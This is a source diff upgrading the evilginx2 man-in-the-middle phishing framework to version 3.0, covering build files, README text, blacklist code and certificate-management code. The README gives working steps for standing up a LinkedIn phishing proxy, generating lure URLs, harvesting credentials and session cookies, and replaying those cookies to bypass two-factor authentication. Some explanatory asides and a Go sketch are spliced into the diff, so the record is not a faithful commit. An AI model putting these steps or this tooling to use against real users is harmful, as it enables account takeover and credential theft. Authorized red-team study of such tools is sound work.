|
||||
|
||||
If the disclaimer of warranty and limitation of liability provided above cannot be
|
||||
given local legal effect according to their terms, reviewing courts shall apply local
|
||||
law that most closely approximates an absolute waiver of all civil liability in
|
||||
connection with the Program, unless a warranty or assumption of liability accompanies
|
||||
a copy of the Program in return for a fee.
|
||||
|
||||
_END OF TERMS AND CONDITIONS_
|
||||
|
||||
## How to Apply These Terms to Your New Programs
|
||||
|
||||
If you develop a new program, and you want it to be of the greatest possible use to
|
||||
the public, the best way to achieve this is to make it free software which everyone
|
||||
can redistribute and change under these terms.
|
||||
|
||||
To do so, attach the following notices to the program. It is safest to attach them
|
||||
to the start of each source file to most effectively state the exclusion of warranty;
|
||||
and each file should have at least the “copyright” line and a pointer to
|
||||
where the full notice is found.
|
||||
|
||||
<one line to give the program's name and a brief idea of what it does.>
|
||||
Copyright (C) <year> <name of author>
|
||||
|
||||
This program is free software: you can redistribute it and/or modify
|
||||
it under the terms of the GNU General Public License as published by
|
||||
the Free Software Foundation, either version 3 of the License, or
|
||||
(at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
Also add information on how to contact you by electronic and paper mail.
|
||||
|
||||
If the program does terminal interaction, make it output a short notice like this
|
||||
when it starts in an interactive mode:
|
||||
|
||||
<program> Copyright (C) <year> <name of author>
|
||||
This program comes with ABSOLUTELY NO WARRANTY; for details type 'show w'.
|
||||
This is free software, and you are welcome to redistribute it
|
||||
under certain conditions; type 'show c' for details.
|
||||
|
||||
The hypothetical commands `show w` and `show c` should show the appropriate parts of
|
||||
the General Public License. Of course, your program's commands might be different;
|
||||
for a GUI interface, you would use an “about box”.
|
||||
|
||||
You should also get your employer (if you work as a programmer) or school, if any, to
|
||||
sign a “copyright disclaimer” for the program, if necessary. For more
|
||||
information on this, and how to apply and follow the GNU GPL, see
|
||||
<<http://www.gnu.org/licenses/>>.
|
||||
|
||||
The GNU General Public License does not permit incorporating your program into
|
||||
proprietary programs. If your program is a subroutine library, you may consider it
|
||||
more useful to permit linking proprietary applications with the library. If this is
|
||||
what you want to do, use the GNU Lesser General Public License instead of this
|
||||
License. But first, please read
|
||||
<<http://www.gnu.org/philosophy/why-not-lgpl.html>>.

Copyright (c) 2018-2023 Kuba Gretzky. All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:

   * Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
   * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer
in the documentation and/or other materials provided with the
distribution.
   * Neither the name of Google Inc. nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Makefile: 13 changes
@@ -1,19 +1,12 @@
TARGET=evilginx
PACKAGES=core database log parser

.PHONY: all
.PHONY: all build clean

all: build

build:
	@go build -o ./bin/$(TARGET) -mod=vendor
	@go build -o ./build/$(TARGET) -mod=vendor main.go

clean:
	@go clean
	@rm -f ./bin/$(TARGET)

install:
	@mkdir -p /usr/share/evilginx/phishlets
	@mkdir -p /usr/share/evilginx/templates
	@cp ./phishlets/* /usr/share/evilginx/phishlets/
	@cp ./templates/* /usr/share/evilginx/templates/
	@cp ./bin/$(TARGET) /usr/local/bin
	@rm -f ./build/$(TARGET)
README.md: 188 changes
@@ -5,7 +5,9 @@
</p>
</p>

**evilginx2** is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows bypassing 2-factor authentication protection.
# Evilginx 3.0

**Evilginx** is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows bypassing 2-factor authentication protection.

This tool is a successor to [Evilginx](https://github.com/kgretzky/evilginx), released in 2017, which used a custom version of the nginx HTTP server to provide man-in-the-middle functionality and act as a proxy between a browser and the phished website.
The present version is fully written in Go as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.
@@ -18,9 +20,22 @@ Present version is fully written in GO as a standalone application, which implem

I am very much aware that Evilginx can be used for nefarious purposes. This work is merely a demonstration of what adept attackers can do. It is the defender's responsibility to take such attacks into consideration and find ways to protect their users against this type of phishing attack. Evilginx should be used only in legitimate penetration testing assignments with written permission from the to-be-phished parties.

## Write-up
## Evilginx Mastery Training Course

If you want to learn more about this phishing technique, I've published extensive blog posts about **evilginx2** here:
If you want to learn everything about reverse proxy phishing with **Evilginx**, check out my [Evilginx Mastery](https://academy.breakdev.org/evilginx-mastery) course!

<p align="center">
  <a href="https://academy.breakdev.org/evilginx-mastery"><img alt="Evilginx Mastery" src="https://raw.githubusercontent.com/kgretzky/evilginx2/master/media/img/evilginx_mastery.jpg" height="320" /></a>
</p>

Learn everything about the latest methods of phishing, using reverse proxying to bypass Multi-Factor Authentication. Learn to think like an attacker during your red team engagements, and become the master of phishing with Evilginx.

Grab it here:
https://academy.breakdev.org/evilginx-mastery

## Write-ups

If you want to learn more about reverse proxy phishing, I've published extensive blog posts about **Evilginx** here:

[Evilginx 2.0 - Release](https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens)

@@ -32,173 +47,18 @@ If you want to learn more about this phishing technique, I've published extensiv

[Evilginx 2.4 - Gone Phishing](https://breakdev.org/evilginx-2-4-gone-phishing/)

## Video guide
[Evilginx 3.0](https://breakdev.org/evilginx-3-0-evilginx-mastery/)

Take a look at the fantastic videos made by Luke Turvey ([@TurvSec](https://twitter.com/TurvSec)), which fully explain how to get started using **evilginx2**.
## Help

[How to phish for passwords and bypass 2FA](https://mrturvey.co.uk/aiovg_videos/how-to-phish-for-passwords-and-bypass-2fa/)
[Creating custom phishlets for evilginx2 2FA bypass](https://mrturvey.co.uk/aiovg_videos/creating-custom-phishlets-for-evilginx2-2fa-bypass/)
In case you want to learn how to install and use **Evilginx**, please refer to the online documentation available at:

## Phishlet Masters - Hall of Fame

Please thank the following contributors for devoting their precious time to deliver us fresh phishlets! (in order of first contributions)

[**@an0nud4y**](https://twitter.com/an0nud4y) - PayPal, TikTok, Coinbase, Airbnb

[**@cust0msync**](https://twitter.com/cust0msync) - Amazon, Reddit

[**@white_fi**](https://twitter.com/white_fi) - Twitter

[**rvrsh3ll @424f424f**](https://twitter.com/424f424f) - Citrix

[**audibleblink @4lex**](https://twitter.com/4lex) - GitHub

[**@JamesCullum**](https://github.com/JamesCullum) - Office 365

## Installation

You can either use a [precompiled binary package](https://github.com/kgretzky/evilginx2/releases) for your architecture or you can compile **evilginx2** from source.

You will need an external server where you'll host your **evilginx2** installation. I personally recommend Digital Ocean, and if you follow my referral link, you will [get an extra $10 to spend on servers for free](https://m.do.co/c/50338abc7ffe).

Evilginx runs very well on the most basic Debian 8 VPS.

#### Installing from source

In order to compile from source, make sure you have **Go** version **1.14.0** or newer installed (get it from [here](https://golang.org/doc/install)).

When you have Go installed, type in the following:

```
sudo apt-get -y install git make
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
```

You can now either run **evilginx2** from the local directory like:
```
sudo ./bin/evilginx -p ./phishlets/
```
or install it globally:
```
sudo make install
sudo evilginx
```

The instructions above can also be used to update **evilginx2** to the latest version.

#### Installing with Docker

You can launch **evilginx2** from within Docker. First build the image:
```
docker build . -t evilginx2
```

Then you can run the container:
```
docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2
```

Phishlets are loaded within the container at `/app/phishlets`, which can be mounted as a volume for configuration.
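For example, to keep phishlet configuration on the host, the standard Docker volume flag can be added to the run command above (the host path is only an illustration):
```
docker run -it -p 53:53/udp -p 80:80 -p 443:443 -v /opt/phishlets:/app/phishlets evilginx2
```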

#### Installing from precompiled binary packages

Grab the package you want from [here](https://github.com/kgretzky/evilginx2/releases) and drop it on your box. Then do:
```
tar zxvf evilginx-linux-amd64.tar.gz
cd evilginx
```

If you want to do a system-wide install, use the install script with root privileges:
```
chmod 700 ./install.sh
sudo ./install.sh
sudo evilginx
```
or just launch **evilginx2** from the current directory (you will also need root privileges):
```
chmod 700 ./evilginx
sudo ./evilginx
```

## Usage

**IMPORTANT!** Make sure that there is no service listening on ports `TCP 443`, `TCP 80` and `UDP 53`. You may need to shut down apache or nginx and any service used for resolving DNS that may be running. **evilginx2** will tell you on launch if it fails to open a listening socket on any of these ports.

By default, **evilginx2** will look for phishlets in the `./phishlets/` directory and then in `/usr/share/evilginx/phishlets/`. If you want to specify a custom path to load phishlets from, use the `-p <phishlets_dir_path>` parameter when launching the tool.

By default, **evilginx2** will look for HTML templates in the `./templates/` directory and then in `/usr/share/evilginx/templates/`. If you want to specify a custom path to load HTML templates from, use the `-t <templates_dir_path>` parameter when launching the tool.

```
Usage of ./evilginx:
  -c string
        Configuration directory path
  -debug
        Enable debug output
  -developer
        Enable developer mode (generates self-signed certificates for all hostnames)
  -p string
        Phishlets directory path
  -t string
        HTML templates directory path
```
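As a usage example, the flags above can be combined into a single launch command; the directory paths shown here are only illustrative:
```
sudo ./evilginx -p ./phishlets/ -t ./templates/ -c /root/.evilginx/
```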
|
||||
|
||||
You should see **evilginx2** logo with a prompt to enter commands. Type `help` or `help <command>` if you want to see available commands or more detailed information on them.
|
||||
|
||||
## Getting started
|
||||
|
||||
To get up and running, you need to first do some setting up.
|
||||
|
||||
At this point I assume, you've already registered a domain (let's call it `yourdomain.com`) and you set up the nameservers (both `ns1` and `ns2`) in your domain provider's admin panel to point to your server's IP (e.g. 10.0.0.1):
|
||||
```
|
||||
ns1.yourdomain.com = 10.0.0.1
|
||||
ns2.yourdomain.com = 10.0.0.1
|
||||
```
|
||||
|
||||
Set up your server's domain and IP using following commands:
|
||||
```
|
||||
config domain yourdomain.com
|
||||
config ip 10.0.0.1
|
||||
```
|
||||
|
||||
Now you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain obviously):
|
||||
```
|
||||
phishlets hostname linkedin my.phishing.hostname.yourdomain.com
|
||||
```
|
||||
|
||||
And now you can `enable` the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:
|
||||
```
|
||||
phishlets enable linkedin
|
||||
```
|
||||
|
||||
Your phishing site is now live. Think of the URL, you want the victim to be redirected to on successful login and get the phishing URL like this (victim will be redirected to `https://www.google.com`):
|
||||
```
|
||||
lures create linkedin
|
||||
lures edit 0 redirect_url https://www.google.com
|
||||
lures get-url 0
|
||||
```
|
||||
|
||||
Running phishlets will only respond to phishing links generating for specific lures, so any scanners who scan your main domain will be redirected to URL specified as `redirect_url` under `config`. If you want to hide your phishlet and make it not respond even to valid lure phishing URLs, use `phishlet hide/unhide <phishlet>` command.

You can monitor captured credentials and session cookies with:
```
sessions
```

To get detailed information about a captured session, including the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:
```
sessions <id>
```

The captured session cookie can be copied and imported into the Chrome browser using the [EditThisCookie](https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg?hl=en) extension.

**Important!** If you want **evilginx2** to continue running after you log out from your server, you should run it inside a `screen` or `tmux` session.
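
For example, with `tmux` (standard tmux usage, not an evilginx feature):

```
tmux new -s evilginx
sudo ./evilginx
# detach with Ctrl-b d, then reattach later with:
tmux attach -t evilginx
```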

https://help.evilginx.com

## Support

I DO NOT offer support for providing or creating phishlets. I will also NOT help you with creation of your own phishlets. There are many phishlets provided as examples, which you can use to create your own.
I DO NOT offer support for providing or creating phishlets. I will also NOT help you with creation of your own phishlets. Please look for ready-to-use phishlets, provided by other people.

## License

**evilginx2** is made by Kuba Gretzky ([@mrgretzky](https://twitter.com/mrgretzky)) and it's released under GPL3 license.
**evilginx2** is made by Kuba Gretzky ([@mrgretzky](https://twitter.com/mrgretzky)) and it's released under BSD-3 license.

4
build.bat
Normal file
4
build.bat
Normal file
@ -0,0 +1,4 @@
@echo off
set GOARCH=amd64
echo Building...
go build -o .\build\evilginx.exe -mod=vendor
4
build_run.bat
Normal file
4
build_run.bat
Normal file
@ -0,0 +1,4 @@
@echo off
set GOARCH=amd64
echo Building...
go build -o .\build\evilginx.exe -mod=vendor && cls && .\build\evilginx.exe -p ./phishlets -t ./redirectors -developer -debug
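
For reference, a roughly equivalent build-and-run invocation on Linux might look like the following; the output path, `clear` instead of `cls`, and the use of `sudo` are assumptions mirroring the Windows script above:

```
go build -o ./build/evilginx -mod=vendor && clear && sudo ./build/evilginx -p ./phishlets -t ./redirectors -developer -debug
```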
@ -8,7 +8,7 @@ import (
|
||||
)
|
||||
|
||||
const (
|
||||
VERSION = "2.4.2"
|
||||
VERSION = "3.0.0"
|
||||
)
|
||||
|
||||
func putAsciiArt(s string) {
|
||||
@ -55,8 +55,8 @@ func printLogo(s string) {
|
||||
}
|
||||
|
||||
func printUpdateName() {
|
||||
nameClr := color.New(color.FgHiRed)
|
||||
txt := nameClr.Sprintf(" - -- Gone Phishing -- -")
|
||||
nameClr := color.New(color.FgHiWhite)
|
||||
txt := nameClr.Sprintf(" - -- Community Edition -- -")
|
||||
fmt.Fprintf(color.Output, "%s", txt)
|
||||
}
|
||||
|
||||
|
@ -10,12 +10,6 @@ import (
|
||||
"github.com/kgretzky/evilginx2/log"
|
||||
)
|
||||
|
||||
const (
|
||||
BLACKLIST_MODE_FULL = 0
|
||||
BLACKLIST_MODE_UNAUTH = 1
|
||||
BLACKLIST_MODE_OFF = 2
|
||||
)
|
||||
|
||||
type BlockIP struct {
|
||||
ipv4 net.IP
|
||||
mask *net.IPNet
|
||||
@ -25,7 +19,7 @@ type Blacklist struct {
|
||||
ips map[string]*BlockIP
|
||||
masks []*BlockIP
|
||||
configPath string
|
||||
mode int
|
||||
verbose bool
|
||||
}
|
||||
|
||||
func NewBlacklist(path string) (*Blacklist, error) {
|
||||
@ -38,7 +32,7 @@ func NewBlacklist(path string) (*Blacklist, error) {
|
||||
bl := &Blacklist{
|
||||
ips: make(map[string]*BlockIP),
|
||||
configPath: path,
|
||||
mode: BLACKLIST_MODE_OFF,
|
||||
verbose: true,
|
||||
}
|
||||
|
||||
fs := bufio.NewScanner(f)
|
||||
@ -71,10 +65,14 @@ func NewBlacklist(path string) (*Blacklist, error) {
|
||||
}
|
||||
}
|
||||
|
||||
log.Info("blacklist: loaded %d ip addresses or ip masks", len(bl.ips)+len(bl.masks))
|
||||
log.Info("blacklist: loaded %d ip addresses and %d ip masks", len(bl.ips), len(bl.masks))
|
||||
return bl, nil
|
||||
}
|
||||
|
||||
func (bl *Blacklist) GetStats() (int, int) {
|
||||
return len(bl.ips), len(bl.masks)
|
||||
}
|
||||
|
||||
func (bl *Blacklist) AddIP(ip string) error {
|
||||
if bl.IsBlacklisted(ip) {
|
||||
return nil
|
||||
@ -118,3 +116,11 @@ func (bl *Blacklist) IsBlacklisted(ip string) bool {
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func (bl *Blacklist) SetVerbose(verbose bool) {
|
||||
bl.verbose = verbose
|
||||
}
|
||||
|
||||
func (bl *Blacklist) IsVerbose() bool {
|
||||
return bl.verbose
|
||||
}
|
||||
|
394
core/certdb.go
394
core/certdb.go
@ -1,7 +1,7 @@
|
||||
package core
|
||||
|
||||
import (
|
||||
"crypto"
|
||||
"context"
|
||||
"crypto/rand"
|
||||
"crypto/rsa"
|
||||
"crypto/tls"
|
||||
@ -13,114 +13,104 @@ import (
|
||||
"math/big"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/kgretzky/evilginx2/log"
|
||||
|
||||
"github.com/go-acme/lego/v3/certcrypto"
|
||||
"github.com/go-acme/lego/v3/certificate"
|
||||
"github.com/go-acme/lego/v3/challenge"
|
||||
"github.com/go-acme/lego/v3/lego"
|
||||
legolog "github.com/go-acme/lego/v3/log"
|
||||
"github.com/go-acme/lego/v3/registration"
|
||||
"github.com/caddyserver/certmagic"
|
||||
)
|
||||
|
||||
const HOSTS_DIR = "hosts"
|
||||
|
||||
type CertDb struct {
|
||||
PrivateKey *rsa.PrivateKey
|
||||
CACert tls.Certificate
|
||||
client *lego.Client
|
||||
certUser CertUser
|
||||
dataDir string
|
||||
ns *Nameserver
|
||||
hs *HttpServer
|
||||
cfg *Config
|
||||
hostCache map[string]*tls.Certificate
|
||||
phishletCache map[string]map[string]*tls.Certificate
|
||||
tls_cache map[string]*tls.Certificate
|
||||
httpChallenge *HTTPChallenge
|
||||
cache_dir string
|
||||
magic *certmagic.Config
|
||||
cfg *Config
|
||||
ns *Nameserver
|
||||
caCert tls.Certificate
|
||||
tlsCache map[string]*tls.Certificate
|
||||
}
|
||||
|
||||
type CertUser struct {
|
||||
Email string
|
||||
Registration *registration.Resource
|
||||
key crypto.PrivateKey
|
||||
}
|
||||
func NewCertDb(cache_dir string, cfg *Config, ns *Nameserver) (*CertDb, error) {
|
||||
os.Setenv("XDG_DATA_HOME", cache_dir)
|
||||
|
||||
func (u CertUser) GetEmail() string {
|
||||
return u.Email
|
||||
}
|
||||
|
||||
func (u CertUser) GetRegistration() *registration.Resource {
|
||||
return u.Registration
|
||||
}
|
||||
|
||||
func (u CertUser) GetPrivateKey() crypto.PrivateKey {
|
||||
return u.key
|
||||
}
|
||||
|
||||
type HTTPChallenge struct {
|
||||
crt_db *CertDb
|
||||
}
|
||||
|
||||
func (ch HTTPChallenge) Present(domain, token, keyAuth string) error {
|
||||
ch.crt_db.hs.AddACMEToken(token, keyAuth)
|
||||
return nil
|
||||
}
|
||||
|
||||
func (ch HTTPChallenge) CleanUp(domain, token, keyAuth string) error {
|
||||
ch.crt_db.hs.ClearACMETokens()
|
||||
return nil
|
||||
}
|
||||
|
||||
const acmeURL = "https://acme-v02.api.letsencrypt.org/directory"
|
||||
|
||||
//const acmeURL = "https://acme-staging-v02.api.letsencrypt.org/directory"
|
||||
|
||||
func NewCertDb(data_dir string, cfg *Config, ns *Nameserver, hs *HttpServer) (*CertDb, error) {
|
||||
d := &CertDb{
|
||||
cfg: cfg,
|
||||
dataDir: data_dir,
|
||||
ns: ns,
|
||||
hs: hs,
|
||||
o := &CertDb{
|
||||
cache_dir: cache_dir,
|
||||
cfg: cfg,
|
||||
ns: ns,
|
||||
tlsCache: make(map[string]*tls.Certificate),
|
||||
}
|
||||
|
||||
legolog.Logger = log.NullLogger()
|
||||
d.hostCache = make(map[string]*tls.Certificate)
|
||||
d.phishletCache = make(map[string]map[string]*tls.Certificate)
|
||||
d.tls_cache = make(map[string]*tls.Certificate)
|
||||
certmagic.DefaultACME.Agreed = true
|
||||
certmagic.DefaultACME.Email = o.GetEmail()
|
||||
|
||||
pkey_pem, err := ioutil.ReadFile(filepath.Join(data_dir, "private.key"))
|
||||
|
||||
err := o.generateCertificates()
|
||||
if err != nil {
|
||||
// private key corrupted or not found, recreate and delete all public certificates
|
||||
os.RemoveAll(filepath.Join(data_dir, "*"))
|
||||
return nil, err
|
||||
}
|
||||
err = o.reloadCertificates()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
d.PrivateKey, err = rsa.GenerateKey(rand.Reader, 2048)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("private key generation failed")
|
||||
}
|
||||
pkey_pem = pem.EncodeToMemory(&pem.Block{
|
||||
Type: "RSA PRIVATE KEY",
|
||||
Bytes: x509.MarshalPKCS1PrivateKey(d.PrivateKey),
|
||||
})
|
||||
err = ioutil.WriteFile(filepath.Join(data_dir, "private.key"), pkey_pem, 0600)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
o.magic = certmagic.NewDefault()
|
||||
|
||||
return o, nil
|
||||
}
|
||||
|
||||
func (o *CertDb) GetEmail() string {
|
||||
var email string
|
||||
fn := filepath.Join(o.cache_dir, "email.txt")
|
||||
|
||||
data, err := ReadFromFile(fn)
|
||||
if err != nil {
|
||||
email = strings.ToLower(GenRandomString(3) + "@" + GenRandomString(6) + ".com")
|
||||
if SaveToFile([]byte(email), fn, 0600) != nil {
|
||||
log.Error("saving email error: %s", err)
|
||||
}
|
||||
} else {
|
||||
block, _ := pem.Decode(pkey_pem)
|
||||
email = strings.TrimSpace(string(data))
|
||||
}
|
||||
return email
|
||||
}
|
||||
|
||||
func (o *CertDb) generateCertificates() error {
|
||||
var key *rsa.PrivateKey
|
||||
|
||||
pkey, err := ioutil.ReadFile(filepath.Join(o.cache_dir, "private.key"))
|
||||
if err != nil {
|
||||
pkey, err = ioutil.ReadFile(filepath.Join(o.cache_dir, "ca.key"))
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
// private key corrupted or not found, recreate and delete all public certificates
|
||||
os.RemoveAll(filepath.Join(o.cache_dir, "*"))
|
||||
|
||||
key, err = rsa.GenerateKey(rand.Reader, 2048)
|
||||
if err != nil {
|
||||
return fmt.Errorf("private key generation failed")
|
||||
}
|
||||
pkey = pem.EncodeToMemory(&pem.Block{
|
||||
Type: "RSA PRIVATE KEY",
|
||||
Bytes: x509.MarshalPKCS1PrivateKey(key),
|
||||
})
|
||||
err = ioutil.WriteFile(filepath.Join(o.cache_dir, "ca.key"), pkey, 0600)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
} else {
|
||||
block, _ := pem.Decode(pkey)
|
||||
if block == nil {
|
||||
return nil, fmt.Errorf("private key is corrupted")
|
||||
return fmt.Errorf("private key is corrupted")
|
||||
}
|
||||
|
||||
d.PrivateKey, err = x509.ParsePKCS1PrivateKey(block.Bytes)
|
||||
key, err = x509.ParsePKCS1PrivateKey(block.Bytes)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
||||
ca_crt_pem, err := ioutil.ReadFile(filepath.Join(data_dir, "ca.crt"))
|
||||
ca_cert, err := ioutil.ReadFile(filepath.Join(o.cache_dir, "ca.crt"))
|
||||
if err != nil {
|
||||
notBefore := time.Now()
|
||||
aYear := time.Duration(10*365*24) * time.Hour
|
||||
@ -128,7 +118,7 @@ func NewCertDb(data_dir string, cfg *Config, ns *Nameserver, hs *HttpServer) (*C
|
||||
serialNumberLimit := new(big.Int).Lsh(big.NewInt(1), 128)
|
||||
serialNumber, err := rand.Int(rand.Reader, serialNumberLimit)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
return err
|
||||
}
|
||||
|
||||
template := x509.Certificate{
|
||||
@ -148,242 +138,64 @@ func NewCertDb(data_dir string, cfg *Config, ns *Nameserver, hs *HttpServer) (*C
|
||||
IsCA: true,
|
||||
}
|
||||
|
||||
cert, err := x509.CreateCertificate(rand.Reader, &template, &template, &d.PrivateKey.PublicKey, d.PrivateKey)
|
||||
cert, err := x509.CreateCertificate(rand.Reader, &template, &template, &key.PublicKey, key)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
return err
|
||||
}
|
||||
ca_crt_pem = pem.EncodeToMemory(&pem.Block{
|
||||
ca_cert = pem.EncodeToMemory(&pem.Block{
|
||||
Type: "CERTIFICATE",
|
||||
Bytes: cert,
|
||||
})
|
||||
err = ioutil.WriteFile(filepath.Join(data_dir, "ca.crt"), ca_crt_pem, 0600)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
}
|
||||
|
||||
d.CACert, err = tls.X509KeyPair(ca_crt_pem, pkey_pem)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
return d, nil
|
||||
}
|
||||
|
||||
func (d *CertDb) Reset() {
|
||||
d.certUser.Email = "" //hostmaster@" + d.cfg.GetBaseDomain()
|
||||
}
|
||||
|
||||
func (d *CertDb) SetupHostnameCertificate(hostname string) error {
|
||||
err := d.loadHostnameCertificate(hostname)
|
||||
if err != nil {
|
||||
log.Warning("failed to load certificate files for hostname '%s': %v", hostname, err)
|
||||
log.Info("requesting SSL/TLS certificates from LetsEncrypt...")
|
||||
err = d.obtainHostnameCertificate(hostname)
|
||||
err = ioutil.WriteFile(filepath.Join(o.cache_dir, "ca.crt"), ca_cert, 0600)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (d *CertDb) GetHostnameCertificate(hostname string) (*tls.Certificate, error) {
|
||||
cert, ok := d.hostCache[hostname]
|
||||
if ok {
|
||||
return cert, nil
|
||||
}
|
||||
return nil, fmt.Errorf("certificate for hostname '%s' not found", hostname)
|
||||
}
|
||||
|
||||
func (d *CertDb) addHostnameCertificate(hostname string, cert *tls.Certificate) {
|
||||
d.hostCache[hostname] = cert
|
||||
}
|
||||
|
||||
func (d *CertDb) loadHostnameCertificate(hostname string) error {
|
||||
crt_dir := filepath.Join(d.dataDir, HOSTS_DIR)
|
||||
|
||||
cert, err := tls.LoadX509KeyPair(filepath.Join(crt_dir, hostname+".crt"), filepath.Join(crt_dir, hostname+".key"))
|
||||
o.caCert, err = tls.X509KeyPair(ca_cert, pkey)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
d.addHostnameCertificate(hostname, &cert)
|
||||
return nil
|
||||
}
|
||||
|
||||
func (d *CertDb) obtainHostnameCertificate(hostname string) error {
|
||||
if err := CreateDir(filepath.Join(d.dataDir, HOSTS_DIR), 0700); err != nil {
|
||||
return err
|
||||
}
|
||||
crt_dir := filepath.Join(d.dataDir, HOSTS_DIR)
|
||||
|
||||
domains := []string{hostname}
|
||||
cert_res, err := d.registerCertificate(domains)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
cert, err := tls.X509KeyPair(cert_res.Certificate, cert_res.PrivateKey)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
d.addHostnameCertificate(hostname, &cert)
|
||||
|
||||
err = ioutil.WriteFile(filepath.Join(crt_dir, hostname+".crt"), cert_res.Certificate, 0600)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
err = ioutil.WriteFile(filepath.Join(crt_dir, hostname+".key"), cert_res.PrivateKey, 0600)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (d *CertDb) SetupPhishletCertificate(site_name string, domains []string) error {
|
||||
base_domain, ok := d.cfg.GetSiteDomain(site_name)
|
||||
if !ok {
|
||||
return fmt.Errorf("phishlet '%s' not found", site_name)
|
||||
}
|
||||
|
||||
err := d.loadPhishletCertificate(site_name, base_domain)
|
||||
if err != nil {
|
||||
log.Warning("failed to load certificate files for phishlet '%s', domain '%s': %v", site_name, base_domain, err)
|
||||
log.Info("requesting SSL/TLS certificates from LetsEncrypt...")
|
||||
err = d.obtainPhishletCertificate(site_name, base_domain, domains)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (d *CertDb) GetPhishletCertificate(site_name string, base_domain string) (*tls.Certificate, error) {
|
||||
m, ok := d.phishletCache[base_domain]
|
||||
if ok {
|
||||
cert, ok := m[site_name]
|
||||
if ok {
|
||||
return cert, nil
|
||||
}
|
||||
}
|
||||
return nil, fmt.Errorf("certificate for phishlet '%s' and domain '%s' not found", site_name, base_domain)
|
||||
func (o *CertDb) setManagedSync(hosts []string, t time.Duration) error {
|
||||
ctx, cancel := context.WithTimeout(context.Background(), t)
|
||||
err := o.magic.ManageSync(ctx, hosts)
|
||||
cancel()
|
||||
return err
|
||||
}
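
As a side note, the `certmagic` pattern used in `setManagedSync` above (agree to the ACME terms, set a contact email, then call `ManageSync` with a timeout-bounded context) boils down to roughly this standalone sketch. The hostname, email and timeout are placeholders, not values used by evilginx2:

```go
package main

import (
	"context"
	"log"
	"time"

	"github.com/caddyserver/certmagic"
)

// manageCerts mirrors the setManagedSync wrapper above: it asks certmagic to
// obtain (and keep renewing) certificates for the given hostnames, bounding
// the initial ACME exchange with a timeout.
func manageCerts(hosts []string, timeout time.Duration) error {
	certmagic.DefaultACME.Agreed = true
	certmagic.DefaultACME.Email = "hostmaster@example.com" // placeholder

	magic := certmagic.NewDefault()

	ctx, cancel := context.WithTimeout(context.Background(), timeout)
	defer cancel()
	return magic.ManageSync(ctx, hosts)
}

func main() {
	if err := manageCerts([]string{"phish.example.com"}, 60*time.Second); err != nil {
		log.Fatal(err)
	}
}
```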
|
||||
|
||||
func (d *CertDb) addPhishletCertificate(site_name string, base_domain string, cert *tls.Certificate) {
|
||||
_, ok := d.phishletCache[base_domain]
|
||||
if !ok {
|
||||
d.phishletCache[base_domain] = make(map[string]*tls.Certificate)
|
||||
}
|
||||
d.phishletCache[base_domain][site_name] = cert
|
||||
}
|
||||
|
||||
func (d *CertDb) loadPhishletCertificate(site_name string, base_domain string) error {
|
||||
